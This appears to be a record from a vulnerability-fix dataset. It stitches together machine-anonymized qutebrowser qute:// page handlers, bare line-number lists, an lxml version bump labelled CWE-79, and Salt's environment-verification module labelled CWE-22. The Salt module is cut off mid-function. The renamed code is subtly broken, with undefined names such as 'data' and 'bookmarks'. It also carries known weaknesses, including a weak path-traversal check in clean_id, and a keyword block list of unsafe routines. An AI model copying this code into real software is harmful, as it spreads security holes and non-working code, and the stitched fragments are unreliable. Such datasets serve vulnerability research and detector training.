log.misc.debug("url: {}, VAR_15: {}, VAR_16 {}".format(
VAR_3.toDisplayString(), VAR_15, VAR_16))
if not VAR_15 or not VAR_16:
VAR_29 = QUrl()
VAR_29.setScheme('qute')
if VAR_16:
VAR_29.setHost(VAR_16)
else:
VAR_29.setHost(VAR_15)
VAR_29.setPath('/')
if VAR_17:
VAR_29.setQuery(VAR_17)
if VAR_29.host(): # VAR_15 was a valid VAR_16
raise CLASS_3(VAR_29)
try:
VAR_30 = VAR_2[VAR_16]
except KeyError:
raise CLASS_0(VAR_3)
try:
VAR_31, VAR_32 = VAR_30(VAR_3)
except OSError as e:
raise CLASS_1(e)
except CLASS_2:
raise
assert VAR_31 is not None, VAR_3
if VAR_31 == 'text/html' and isinstance(VAR_32, str):
VAR_32 = data.encode('utf-8', errors='xmlcharrefreplace')
return VAR_31, VAR_32
@CLASS_4('bookmarks')
def FUNC_1(VAR_4):
VAR_18 = sorted(objreg.get('bookmark-manager').marks.items(),
key=lambda x: x[1]) # Sort by title
VAR_19 = sorted(objreg.get('quickmark-manager').marks.items(),
key=lambda x: x[0]) # Sort by VAR_9
VAR_20 = jinja.render('bookmarks.html',
title='Bookmarks',
VAR_18=bookmarks,
VAR_19=quickmarks)
return 'text/html', VAR_20
@CLASS_4('tabs')
def FUNC_2(VAR_4):
VAR_21 = collections.defaultdict(list)
for win_id, window in objreg.window_registry.items():
if sip.isdeleted(window):
continue
VAR_33 = objreg.get('tabbed-browser',
scope='window',
window=win_id)
for tab in VAR_33.widgets():
if tab.url() not in [QUrl("qute://VAR_21/"), QUrl("qute://tabs")]:
VAR_45 = tab.url().toDisplayString()
VAR_21[str(win_id)].append((tab.title(), VAR_45))
VAR_20 = jinja.render('tabs.html',
title='Tabs',
tab_list_by_window=VAR_21)
return 'text/html', VAR_20
def FUNC_3(VAR_5, VAR_6=None):
VAR_5 = int(VAR_5)
VAR_22 = objreg.get('web-history')
if VAR_6 is not None:
VAR_34 = VAR_22.entries_before(VAR_5, limit=1000, VAR_6=offset)
else:
VAR_35 = VAR_5 - 24*60*60
VAR_34 = VAR_22.entries_between(VAR_35, VAR_5)
return [{"url": VAR_20.escape(e.url),
"title": VAR_20.escape(e.title) or VAR_20.escape(e.url),
"time": e.atime} for e in VAR_34]
@CLASS_4('history')
def FUNC_4(VAR_3):
if VAR_3.path() == '/data':
try:
VAR_6 = QUrlQuery(VAR_3).queryItemValue("offset")
VAR_6 = int(VAR_6) if VAR_6 else None
except ValueError as e:
raise CLASS_2("Query parameter VAR_6 is invalid", e)
try:
VAR_5 = QUrlQuery(VAR_3).queryItemValue("start_time")
VAR_5 = float(VAR_5) if VAR_5 else time.time()
except ValueError as e:
raise CLASS_2("Query parameter VAR_5 is invalid", e)
return 'text/html', json.dumps(FUNC_3(VAR_5, VAR_6))
else:
return 'text/html', jinja.render(
'history.html',
title='History',
gap_interval=config.val.history_gap_interval
)
@CLASS_4('javascript')
def FUNC_5(VAR_3):
VAR_15 = VAR_3.path()
if VAR_15:
VAR_15 = "javascript" + os.sep.join(VAR_15.split('/'))
return 'text/html', utils.read_file(VAR_15, binary=False)
else:
raise CLASS_2("No file specified", ValueError())
@CLASS_4('pyeval')
def FUNC_6(VAR_4):
VAR_20 = jinja.render('pre.html', title='pyeval', content=VAR_0)
return 'text/html', VAR_20
@CLASS_4('spawn-output')
def FUNC_7(VAR_4):
VAR_20 = jinja.render('pre.html', title='spawn output', content=VAR_1)
return 'text/html', VAR_20
@CLASS_4('version')
@CLASS_4('verizon')
def FUNC_8(VAR_4):
VAR_20 = jinja.render('version.html', title='Version info',
version=version.version(),
copyright=qutebrowser.__copyright__)
return 'text/html', VAR_20
@CLASS_4('plainlog')
def FUNC_9(VAR_3):
if log.ram_handler is None:
VAR_36 = "Log output was disabled."
else:
VAR_37 = QUrlQuery(VAR_3).queryItemValue('level')
if not VAR_37:
VAR_37 = 'vdebug'
VAR_36 = log.ram_handler.dump_log(VAR_20=False, VAR_37=level)
VAR_20 = jinja.render('pre.html', title='log', content=VAR_36)
return 'text/html', VAR_20
@CLASS_4('log')
def FUNC_10(VAR_3):
if log.ram_handler is None:
VAR_38 = None
else:
VAR_37 = QUrlQuery(VAR_3).queryItemValue('level')
if not VAR_37:
VAR_37 = 'vdebug'
VAR_38 = log.ram_handler.dump_log(VAR_20=True, VAR_37=level)
VAR_20 = jinja.render('log.html', title='log', content=VAR_38)
return 'text/html', VAR_20
@CLASS_4('gpl')
def FUNC_11(VAR_4):
return 'text/html', utils.read_file('html/license.html')
@CLASS_4('help')
def FUNC_12(VAR_3):
VAR_23 = VAR_3.path()
if not VAR_23 or VAR_23 == '/':
VAR_23 = 'index.html'
else:
VAR_23 = VAR_23.lstrip('/')
if not docutils.docs_up_to_date(VAR_23):
message.error("Your documentation is outdated! Please re-run "
"scripts/asciidoc2html.py.")
VAR_15 = 'html/doc/{}'.format(VAR_23)
if not VAR_23.endswith('.html'):
try:
VAR_42 = utils.read_file(VAR_15, binary=True)
except OSError as e:
raise CLASS_1(e)
VAR_31, VAR_39 = mimetypes.guess_type(VAR_23)
assert VAR_31 is not None, VAR_3
return VAR_31, VAR_42
try:
VAR_32 = utils.read_file(VAR_15)
except OSError:
VAR_43 = VAR_15.replace('.html', '.asciidoc')
if VAR_43.startswith('html/doc/'):
VAR_43 = VAR_43.replace('html/doc/', '../doc/help/')
try:
VAR_46 = utils.read_file(VAR_43)
except OSError:
VAR_46 = None
if VAR_46 is None:
raise
VAR_44 = textwrap.dedent("""
There was an VAR_8 loading the documentation!
This most likely means the documentation was not generated
properly. If you are running qutebrowser from the git repository,
please (re)run scripts/asciidoc2html.py and reload this page.
If you're running a released version this is a bug, please use
:report to report it.
Falling back to the plaintext version.
---------------------------------------------------------------
""")
return 'text/plain', (VAR_44 + VAR_46).encode('utf-8')
else:
return 'text/html', VAR_32
@CLASS_4('backend-warning')
def FUNC_13(VAR_4):
VAR_20 = jinja.render('backend-warning.html',
distribution=version.distribution(),
Distribution=version.Distribution,
version=pkg_resources.parse_version,
title="Legacy VAR_10 warning")
return 'text/html', VAR_20
def FUNC_14(VAR_3):
VAR_17 = QUrlQuery(VAR_3)
VAR_24 = VAR_17.queryItemValue('option', QUrl.FullyDecoded)
VAR_25 = VAR_17.queryItemValue('value', QUrl.FullyDecoded)
if VAR_24 == 'content.javascript.enabled' and VAR_25 == 'false':
VAR_40 = ("Refusing to disable javascript via qute://settings "
"as it needs javascript support.")
message.error(VAR_40)
return 'text/html', b'error: ' + VAR_40.encode('utf-8')
try:
config.instance.set_str(VAR_24, VAR_25, save_yaml=True)
return 'text/html', b'ok'
except configexc.Error as e:
message.error(str(e))
return 'text/html', b'error: ' + str(e).encode('utf-8')
@CLASS_4('settings')
def FUNC_15(VAR_3):
if VAR_3.path() == '/set':
return FUNC_14(VAR_3)
VAR_20 = jinja.render('settings.html', title='settings',
configdata=configdata,
confget=config.instance.get_str)
return 'text/html', VAR_20
@CLASS_4('bindings')
def FUNC_16(VAR_4):
VAR_26 = {}
VAR_27 = config.val.bindings.default
VAR_28 = set(VAR_27.keys()).union(config.val.bindings.commands)
VAR_28.remove('normal')
VAR_28 = ['normal'] + sorted(list(VAR_28))
for VAR_41 in VAR_28:
VAR_26[VAR_41] = config.key_instance.get_bindings_for(VAR_41)
VAR_20 = jinja.render('bindings.html', title='Bindings',
VAR_26=bindings)
return 'text/html', VAR_20
@CLASS_4('back')
def FUNC_17(VAR_3):
VAR_20 = jinja.render(
'back.html',
title='Suspended: ' + urllib.parse.unquote(VAR_3.fragment()))
return 'text/html', VAR_20
@CLASS_4('configdiff')
def FUNC_18(VAR_3):
if VAR_3.path() == '/old':
try:
return 'text/html', configdiff.get_diff()
except OSError as e:
VAR_8 = (b'Failed to read old config: ' +
str(e.strerror).encode('utf-8'))
return 'text/plain', VAR_8
else:
VAR_32 = config.instance.dump_userconfig().encode('utf-8')
return 'text/plain', VAR_32
@CLASS_4('pastebin-version')
def FUNC_19(VAR_4):
version.pastebin_version()
return 'text/plain', b'Paste called.'
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
26,
34,
38,
44,
45,
48,
49,
51,
52,
54,
56,
58,
59,
61,
63,
65,
66,
68,
70,
73,
78,
83,
84,
86,
88,
92,
96,
97,
99,
101,
106,
111,
116,
123,
132,
133,
136,
139,
147,
151,
157,
160,
163,
169,
174,
178,
182,
185,
187,
189,
190,
198,
204,
205,
220,
225,
226,
229,
234,
240,
243,
246,
247,
257,
263,
271,
272,
276,
285,
286,
292,
293,
299,
300,
309,
310,
314,
328,
329,
333,
345,
348,
349,
354,
355,
367,
377,
381,
385,
390,
393,
396,
400,
403,
405,
407,
408,
413,
414,
424,
425,
431,
432,
438,
445,
446,
452,
457,
458,
469,
473,
474,
478,
485,
486,
500,
501,
507,
20,
21,
22,
23,
24,
25,
55,
62,
69,
70,
71,
72,
73,
74,
75,
76,
77,
87,
88,
89,
90,
91,
100,
101,
102,
103,
104,
105,
135,
136,
137,
138,
139,
140,
141,
142,
193,
208,
228,
229,
230,
231,
232,
233,
250,
275,
276,
277,
278,
289,
296,
304,
313,
314,
315,
316,
317,
318,
332,
333,
334,
335,
336,
337,
352,
358,
417,
427,
449,
461,
477,
478,
479,
480,
489,
504,
118,
125
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
26,
35,
39,
45,
46,
49,
50,
52,
53,
55,
57,
59,
60,
62,
64,
66,
67,
69,
71,
74,
79,
84,
85,
87,
89,
93,
97,
98,
100,
102,
107,
112,
117,
124,
133,
134,
137,
140,
148,
152,
158,
161,
164,
170,
175,
179,
183,
186,
188,
190,
191,
199,
205,
206,
221,
226,
227,
230,
235,
241,
244,
248,
249,
259,
265,
273,
274,
278,
287,
288,
294,
295,
301,
302,
311,
312,
316,
330,
331,
335,
347,
350,
351,
356,
357,
369,
379,
383,
387,
392,
395,
398,
402,
405,
407,
409,
410,
415,
416,
426,
427,
433,
434,
440,
447,
448,
454,
459,
460,
471,
475,
476,
480,
487,
488,
502,
503,
509,
20,
21,
22,
23,
24,
25,
56,
63,
70,
71,
72,
73,
74,
75,
76,
77,
78,
88,
89,
90,
91,
92,
101,
102,
103,
104,
105,
106,
136,
137,
138,
139,
140,
141,
142,
143,
194,
209,
229,
230,
231,
232,
233,
234,
252,
277,
278,
279,
280,
291,
298,
306,
315,
316,
317,
318,
319,
320,
334,
335,
336,
337,
338,
339,
354,
360,
419,
429,
451,
463,
479,
480,
481,
482,
491,
506,
119,
126
] |
1CWE-79
| # this is a package
__version__ = "4.6.2"
def get_include():
"""
Returns a list of header include paths (for lxml itself, libxml2
and libxslt) needed to compile C code against lxml if it was built
with statically linked libraries.
"""
import os
lxml_path = __path__[0]
include_path = os.path.join(lxml_path, 'includes')
includes = [include_path, lxml_path]
for name in os.listdir(include_path):
path = os.path.join(include_path, name)
if os.path.isdir(path):
includes.append(path)
return includes
| # this is a package
__version__ = "4.6.3"
def get_include():
"""
Returns a list of header include paths (for lxml itself, libxml2
and libxslt) needed to compile C code against lxml if it was built
with statically linked libraries.
"""
import os
lxml_path = __path__[0]
include_path = os.path.join(lxml_path, 'includes')
includes = [include_path, lxml_path]
for name in os.listdir(include_path):
path = os.path.join(include_path, name)
if os.path.isdir(path):
includes.append(path)
return includes
| xss | {
"code": [
"__version__ = \"4.6.2\""
],
"line_no": [
3
]
} | {
"code": [
"__version__ = \"4.6.3\""
],
"line_no": [
3
]
} |
__version__ = "4.6.2"
def FUNC_0():
import os
VAR_0 = __path__[0]
VAR_1 = os.path.join(VAR_0, 'includes')
VAR_2 = [VAR_1, VAR_0]
for name in os.listdir(VAR_1):
VAR_3 = os.path.join(VAR_1, name)
if os.path.isdir(VAR_3):
VAR_2.append(VAR_3)
return VAR_2
|
__version__ = "4.6.3"
def FUNC_0():
import os
VAR_0 = __path__[0]
VAR_1 = os.path.join(VAR_0, 'includes')
VAR_2 = [VAR_1, VAR_0]
for name in os.listdir(VAR_1):
VAR_3 = os.path.join(VAR_1, name)
if os.path.isdir(VAR_3):
VAR_2.append(VAR_3)
return VAR_2
| [
1,
2,
4,
5,
16,
21,
23,
24,
7,
8,
9,
10,
11
] | [
1,
2,
4,
5,
16,
21,
23,
24,
7,
8,
9,
10,
11
] |
0CWE-22
| # -*- coding: utf-8 -*-
'''
A few checks to make sure the environment is sane
'''
from __future__ import absolute_import
# Original Author: Jeff Schroeder <jeffschroeder@computer.org>
# Import python libs
import os
import re
import sys
import stat
import errno
import socket
import logging
# Import third party libs
try:
import win32file
except ImportError:
import resource
# Import salt libs
from salt.log import is_console_configured
from salt.log.setup import LOG_LEVELS
from salt.exceptions import SaltClientError, SaltSystemExit, \
CommandExecutionError
import salt.defaults.exitcodes
import salt.utils
log = logging.getLogger(__name__)
def zmq_version():
'''
ZeroMQ python bindings >= 2.1.9 are required
'''
try:
import zmq
except Exception:
# Return True for local mode
return True
ver = zmq.__version__
# The last matched group can be None if the version
# is something like 3.1 and that will work properly
match = re.match(r'^(\d+)\.(\d+)(?:\.(\d+))?', ver)
# Fallthrough and hope for the best
if not match:
msg = "Using untested zmq python bindings version: '{0}'".format(ver)
if is_console_configured():
log.warning(msg)
else:
sys.stderr.write("WARNING {0}\n".format(msg))
return True
major, minor, point = match.groups()
if major.isdigit():
major = int(major)
if minor.isdigit():
minor = int(minor)
# point very well could be None
if point and point.isdigit():
point = int(point)
if major == 2 and minor == 1:
# zmq 2.1dev could be built against a newer libzmq
if "dev" in ver and not point:
msg = 'Using dev zmq module, please report unexpected results'
if is_console_configured():
log.warning(msg)
else:
sys.stderr.write("WARNING: {0}\n".format(msg))
return True
elif point and point >= 9:
return True
elif major > 2 or (major == 2 and minor > 1):
return True
# If all else fails, gracefully croak and warn the user
log.critical('ZeroMQ python bindings >= 2.1.9 are required')
if 'salt-master' in sys.argv[0]:
msg = ('The Salt Master is unstable using a ZeroMQ version '
'lower than 2.1.11 and requires this fix: http://lists.zeromq.'
'org/pipermail/zeromq-dev/2011-June/012094.html')
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write('CRITICAL {0}\n'.format(msg))
return False
def lookup_family(hostname):
'''
Lookup a hostname and determine its address family. The first address returned
will be AF_INET6 if the system is IPv6-enabled, and AF_INET otherwise.
'''
# If lookups fail, fall back to AF_INET sockets (and v4 addresses).
fallback = socket.AF_INET
try:
hostnames = socket.getaddrinfo(
hostname or None, None, socket.AF_UNSPEC, socket.SOCK_STREAM
)
if not hostnames:
return fallback
h = hostnames[0]
return h[0]
except socket.gaierror:
return fallback
def verify_socket(interface, pub_port, ret_port):
'''
Attempt to bind to the sockets to verify that they are available
'''
addr_family = lookup_family(interface)
for port in pub_port, ret_port:
sock = socket.socket(addr_family, socket.SOCK_STREAM)
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((interface, int(port)))
except Exception as exc:
msg = 'Unable to bind socket {0}:{1}'.format(interface, port)
if exc.args:
msg = '{0}, error: {1}'.format(msg, str(exc))
else:
msg = '{0}, this might not be a problem.'.format(msg)
msg += '; Is there another salt-master running?'
if is_console_configured():
log.warning(msg)
else:
sys.stderr.write('WARNING: {0}\n'.format(msg))
return False
finally:
sock.close()
return True
def verify_files(files, user):
'''
Verify that the named files exist and are owned by the named user
'''
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
except KeyError:
err = ('Failed to prepare the Salt environment for user '
'{0}. The user is not available.\n').format(user)
sys.stderr.write(err)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for fn_ in files:
dirname = os.path.dirname(fn_)
try:
if dirname:
try:
os.makedirs(dirname)
except OSError as err:
if err.errno != errno.EEXIST:
raise
if not os.path.isfile(fn_):
with salt.utils.fopen(fn_, 'w+') as fp_:
fp_.write('')
except IOError as err:
if os.path.isfile(dirname):
msg = 'Failed to create path {0}, is {1} a file?'.format(fn_, dirname)
raise SaltSystemExit(msg=msg)
if err.errno != errno.EACCES:
raise
msg = 'No permissions to access "{0}", are you running as the correct user?'.format(fn_)
raise SaltSystemExit(msg=msg)
except OSError as err:
msg = 'Failed to create path "{0}" - {1}'.format(fn_, err)
raise SaltSystemExit(msg=msg)
stats = os.stat(fn_)
if uid != stats.st_uid:
try:
os.chown(fn_, uid, -1)
except OSError:
pass
return True
def verify_env(dirs, user, permissive=False, pki_dir='', skip_extra=False):
'''
Verify that the named directories are in place and that the environment
can shake the salt
'''
if salt.utils.is_windows():
return win_verify_env(dirs, permissive, pki_dir, skip_extra)
import pwd # after confirming not running Windows
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
groups = salt.utils.get_gid_list(user, include_default=False)
except KeyError:
err = ('Failed to prepare the Salt environment for user '
'{0}. The user is not available.\n').format(user)
sys.stderr.write(err)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
for dir_ in dirs:
if not dir_:
continue
if not os.path.isdir(dir_):
try:
cumask = os.umask(18) # 077
os.makedirs(dir_)
# If starting the process as root, chown the new dirs
if os.getuid() == 0:
os.chown(dir_, uid, gid)
os.umask(cumask)
except OSError as err:
msg = 'Failed to create directory path "{0}" - {1}\n'
sys.stderr.write(msg.format(dir_, err))
sys.exit(err.errno)
mode = os.stat(dir_)
# If starting the process as root, chown the new dirs
if os.getuid() == 0:
fmode = os.stat(dir_)
if fmode.st_uid != uid or fmode.st_gid != gid:
if permissive and fmode.st_gid in groups:
# Allow the directory to be owned by any group root
# belongs to if we say it's ok to be permissive
pass
else:
# chown the file for the new user
os.chown(dir_, uid, gid)
for subdir in [a for a in os.listdir(dir_) if 'jobs' not in a]:
fsubdir = os.path.join(dir_, subdir)
if '{0}jobs'.format(os.path.sep) in fsubdir:
continue
for root, dirs, files in os.walk(fsubdir):
for name in files:
if name.startswith('.'):
continue
path = os.path.join(root, name)
try:
fmode = os.stat(path)
except (IOError, OSError):
pass
if fmode.st_uid != uid or fmode.st_gid != gid:
if permissive and fmode.st_gid in groups:
pass
else:
# chown the file for the new user
os.chown(path, uid, gid)
for name in dirs:
path = os.path.join(root, name)
fmode = os.stat(path)
if fmode.st_uid != uid or fmode.st_gid != gid:
if permissive and fmode.st_gid in groups:
pass
else:
# chown the file for the new user
os.chown(path, uid, gid)
# Allow the pki dir to be 700 or 750, but nothing else.
# This prevents other users from writing out keys, while
# allowing the use-case of 3rd-party software (like django)
# to read in what it needs to integrate.
#
# If the permissions aren't correct, default to the more secure 700.
# If acls are enabled, the pki_dir needs to remain readable, this
# is still secure because the private keys are still only readable
# by the user running the master
if dir_ == pki_dir:
smode = stat.S_IMODE(mode.st_mode)
if smode != 448 and smode != 488:
if os.access(dir_, os.W_OK):
os.chmod(dir_, 448)
else:
msg = 'Unable to securely set the permissions of "{0}".'
msg = msg.format(dir_)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
if skip_extra is False:
# Run the extra verification checks
zmq_version()
def check_user(user):
'''
Check user and assign process uid/gid.
'''
if salt.utils.is_windows():
return True
if user == salt.utils.get_user():
return True
import pwd # after confirming not running Windows
try:
pwuser = pwd.getpwnam(user)
try:
if hasattr(os, 'initgroups'):
os.initgroups(user, pwuser.pw_gid) # pylint: disable=minimum-python-version
else:
os.setgroups(salt.utils.get_gid_list(user, include_default=False))
os.setgid(pwuser.pw_gid)
os.setuid(pwuser.pw_uid)
# We could just reset the whole environment but let's just override
# the variables we can get from pwuser
if 'HOME' in os.environ:
os.environ['HOME'] = pwuser.pw_dir
if 'SHELL' in os.environ:
os.environ['SHELL'] = pwuser.pw_shell
for envvar in ('USER', 'LOGNAME'):
if envvar in os.environ:
os.environ[envvar] = pwuser.pw_name
except OSError:
msg = 'Salt configured to run as user "{0}" but unable to switch.'
msg = msg.format(user)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
return False
except KeyError:
msg = 'User not found: "{0}"'.format(user)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
return False
return True
def list_path_traversal(path):
'''
Returns a full list of directories leading up to, and including, a path.
So list_path_traversal('/path/to/salt') would return:
['/', '/path', '/path/to', '/path/to/salt']
in that order.
This routine has been tested on Windows systems as well.
list_path_traversal('c:\\path\\to\\salt') on Windows would return:
['c:\\', 'c:\\path', 'c:\\path\\to', 'c:\\path\\to\\salt']
'''
out = [path]
(head, tail) = os.path.split(path)
if tail == '':
# paths with trailing separators will return an empty string
out = [head]
(head, tail) = os.path.split(head)
while head != out[0]:
# loop until head is the same two consecutive times
out.insert(0, head)
(head, tail) = os.path.split(head)
return out
def check_path_traversal(path, user='root', skip_perm_errors=False):
'''
Walk from the root up to a directory and verify that the current
user has access to read each directory. This is used for making
sure a user can read all parent directories of the minion's key
before trying to go and generate a new key and raising an IOError
'''
for tpath in list_path_traversal(path):
if not os.access(tpath, os.R_OK):
msg = 'Could not access {0}.'.format(tpath)
if not os.path.exists(tpath):
msg += ' Path does not exist.'
else:
current_user = salt.utils.get_user()
# Make the error message more intelligent based on how
# the user invokes salt-call or whatever other script.
if user != current_user:
msg += ' Try running as user {0}.'.format(user)
else:
msg += ' Please give {0} read permissions.'.format(user)
# We don't need to bail on config file permission errors
# if the CLI
# process is run with the -a flag
if skip_perm_errors:
return
# Propagate this exception up so there isn't a sys.exit()
# in the middle of code that could be imported elsewhere.
raise SaltClientError(msg)
def check_max_open_files(opts):
'''
Check the number of max allowed open files and adjust if needed
'''
mof_c = opts.get('max_open_files', 100000)
if sys.platform.startswith('win'):
# Check the Windows API for more detail on this
# http://msdn.microsoft.com/en-us/library/xt874334(v=vs.71).aspx
# and the python binding http://timgolden.me.uk/pywin32-docs/win32file.html
mof_s = mof_h = win32file._getmaxstdio()
else:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
accepted_keys_dir = os.path.join(opts.get('pki_dir'), 'minions')
accepted_count = len(os.listdir(accepted_keys_dir))
log.debug(
'This salt-master instance has accepted {0} minion keys.'.format(
accepted_count
)
)
level = logging.INFO
if (accepted_count * 4) <= mof_s:
# We check for the soft value of max open files here because that's the
# value the user chose to raise to.
#
# The number of accepted keys multiplied by four(4) is lower than the
# soft value, everything should be OK
return
msg = (
'The number of accepted minion keys({0}) should be lower than 1/4 '
'of the max open files soft setting({1}). '.format(
accepted_count, mof_s
)
)
if accepted_count >= mof_s:
# This should never occur, it might have already crashed
msg += 'salt-master will crash pretty soon! '
level = logging.CRITICAL
elif (accepted_count * 2) >= mof_s:
# This is way too low, CRITICAL
level = logging.CRITICAL
elif (accepted_count * 3) >= mof_s:
level = logging.WARNING
# The accepted count is more than 3 time, WARN
elif (accepted_count * 4) >= mof_s:
level = logging.INFO
if mof_c < mof_h:
msg += ('According to the system\'s hard limit, there\'s still a '
'margin of {0} to raise the salt\'s max_open_files '
'setting. ').format(mof_h - mof_c)
msg += 'Please consider raising this value.'
log.log(level=level, msg=msg)
def clean_path(root, path, subdir=False):
'''
Accepts the root the path needs to be under and verifies that the path is
under said root. Pass in subdir=True if the path can result in a
subdirectory of the root instead of having to reside directly in the root
'''
if not os.path.isabs(root):
return ''
if not os.path.isabs(path):
path = os.path.join(root, path)
path = os.path.normpath(path)
if subdir:
if path.startswith(root):
return path
else:
if os.path.dirname(path) == os.path.normpath(root):
return path
return ''
def clean_id(id_):
'''
Returns if the passed id is clean.
'''
if re.search(r'\.\.\{sep}'.format(sep=os.sep), id_):
return False
return True
def valid_id(opts, id_):
'''
Returns if the passed id is valid
'''
try:
return bool(clean_path(opts['pki_dir'], id_)) and clean_id(id_)
except (AttributeError, KeyError, TypeError) as e:
return False
def safe_py_code(code):
'''
Check a string to see if it has any potentially unsafe routines which
could be executed via python, this routine is used to improve the
safety of modules suct as virtualenv
'''
bads = (
'import',
';',
'subprocess',
'eval',
'open',
'file',
'exec',
'input')
for bad in bads:
if code.count(bad):
return False
return True
def verify_log(opts):
'''
If an insecre logging configuration is found, show a warning
'''
level = LOG_LEVELS.get(str(opts.get('log_level')).lower(), logging.NOTSET)
if level < logging.INFO:
log.warning('Insecure logging configuration detected! Sensitive data may be logged.')
def win_verify_env(dirs, permissive=False, pki_dir='', skip_extra=False):
'''
Verify that the named directories are in place and that the environment
can shake the salt
'''
import salt.utils.win_functions
import salt.utils.win_dacl
# Get the root path directory where salt is installed
path = dirs[0]
while os.path.basename(path) not in ['salt', 'salt-tests-tmpdir']:
path, base = os.path.split(path)
# Create the root path directory if missing
if not os.path.isdir(path):
os.makedirs(path)
# Set permissions to the root path directory
current_user = salt.utils.win_functions.get_current_user()
if salt.utils.win_functions.is_admin(current_user):
try:
# Make the Administrators group owner
# Use the SID to be locale agnostic
salt.utils.win_dacl.set_owner(path, 'S-1-5-32-544')
except CommandExecutionError:
msg = 'Unable to securely set the owner of "{0}".'.format(path)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
if not permissive:
try:
# Get a clean dacl by not passing an obj_name
dacl = salt.utils.win_dacl.dacl()
# Add aces to the dacl, use the GUID (locale non-specific)
# Administrators Group
dacl.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
# System
dacl.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
# Owner
dacl.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
# Save the dacl to the object
dacl.save(path, True)
except CommandExecutionError:
msg = 'Unable to securely set the permissions of ' \
'"{0}".'.format(path)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
# Create the directories
for dir_ in dirs:
if not dir_:
continue
if not os.path.isdir(dir_):
try:
os.makedirs(dir_)
except OSError as err:
msg = 'Failed to create directory path "{0}" - {1}\n'
sys.stderr.write(msg.format(dir_, err))
sys.exit(err.errno)
# The PKI dir gets its own permissions
if dir_ == pki_dir:
try:
# Make Administrators group the owner
salt.utils.win_dacl.set_owner(path, 'S-1-5-32-544')
# Give Admins, System and Owner permissions
# Get a clean dacl by not passing an obj_name
dacl = salt.utils.win_dacl.dacl()
# Add aces to the dacl, use the GUID (locale non-specific)
# Administrators Group
dacl.add_ace('S-1-5-32-544', 'grant', 'full_control',
'this_folder_subfolders_files')
# System
dacl.add_ace('S-1-5-18', 'grant', 'full_control',
'this_folder_subfolders_files')
# Owner
dacl.add_ace('S-1-3-4', 'grant', 'full_control',
'this_folder_subfolders_files')
# Save the dacl to the object
dacl.save(dir_, True)
except CommandExecutionError:
msg = 'Unable to securely set the permissions of "{0}".'
msg = msg.format(dir_)
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write("CRITICAL: {0}\n".format(msg))
if skip_extra is False:
# Run the extra verification checks
zmq_version()
| # -*- coding: utf-8 -*-
'''
A few checks to make sure the environment is sane
'''
from __future__ import absolute_import
# Original Author: Jeff Schroeder <jeffschroeder@computer.org>
# Import python libs
import os
import re
import sys
import stat
import errno
import socket
import logging
# Import third party libs
try:
import win32file
except ImportError:
import resource
# Import salt libs
from salt.log import is_console_configured
from salt.log.setup import LOG_LEVELS
from salt.exceptions import SaltClientError, SaltSystemExit, \
CommandExecutionError
import salt.defaults.exitcodes
import salt.utils
log = logging.getLogger(__name__)
def zmq_version():
'''
ZeroMQ python bindings >= 2.1.9 are required
'''
try:
import zmq
except Exception:
# Return True for local mode
return True
ver = zmq.__version__
# The last matched group can be None if the version
# is something like 3.1 and that will work properly
match = re.match(r'^(\d+)\.(\d+)(?:\.(\d+))?', ver)
# Fallthrough and hope for the best
if not match:
msg = "Using untested zmq python bindings version: '{0}'".format(ver)
if is_console_configured():
log.warning(msg)
else:
sys.stderr.write("WARNING {0}\n".format(msg))
return True
major, minor, point = match.groups()
if major.isdigit():
major = int(major)
if minor.isdigit():
minor = int(minor)
# point very well could be None
if point and point.isdigit():
point = int(point)
if major == 2 and minor == 1:
# zmq 2.1dev could be built against a newer libzmq
if "dev" in ver and not point:
msg = 'Using dev zmq module, please report unexpected results'
if is_console_configured():
log.warning(msg)
else:
sys.stderr.write("WARNING: {0}\n".format(msg))
return True
elif point and point >= 9:
return True
elif major > 2 or (major == 2 and minor > 1):
return True
# If all else fails, gracefully croak and warn the user
log.critical('ZeroMQ python bindings >= 2.1.9 are required')
if 'salt-master' in sys.argv[0]:
msg = ('The Salt Master is unstable using a ZeroMQ version '
'lower than 2.1.11 and requires this fix: http://lists.zeromq.'
'org/pipermail/zeromq-dev/2011-June/012094.html')
if is_console_configured():
log.critical(msg)
else:
sys.stderr.write('CRITICAL {0}\n'.format(msg))
return False
def lookup_family(hostname):
'''
Lookup a hostname and determine its address family. The first address returned
will be AF_INET6 if the system is IPv6-enabled, and AF_INET otherwise.
'''
# If lookups fail, fall back to AF_INET sockets (and v4 addresses).
fallback = socket.AF_INET
try:
hostnames = socket.getaddrinfo(
hostname or None, None, socket.AF_UNSPEC, socket.SOCK_STREAM
)
if not hostnames:
return fallback
h = hostnames[0]
return h[0]
except socket.gaierror:
return fallback
def verify_socket(interface, pub_port, ret_port):
'''
Attempt to bind to the sockets to verify that they are available
'''
addr_family = lookup_family(interface)
for port in pub_port, ret_port:
sock = socket.socket(addr_family, socket.SOCK_STREAM)
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((interface, int(port)))
except Exception as exc:
msg = 'Unable to bind socket {0}:{1}'.format(interface, port)
if exc.args:
msg = '{0}, error: {1}'.format(msg, str(exc))
else:
msg = '{0}, this might not be a problem.'.format(msg)
msg += '; Is there another salt-master running?'
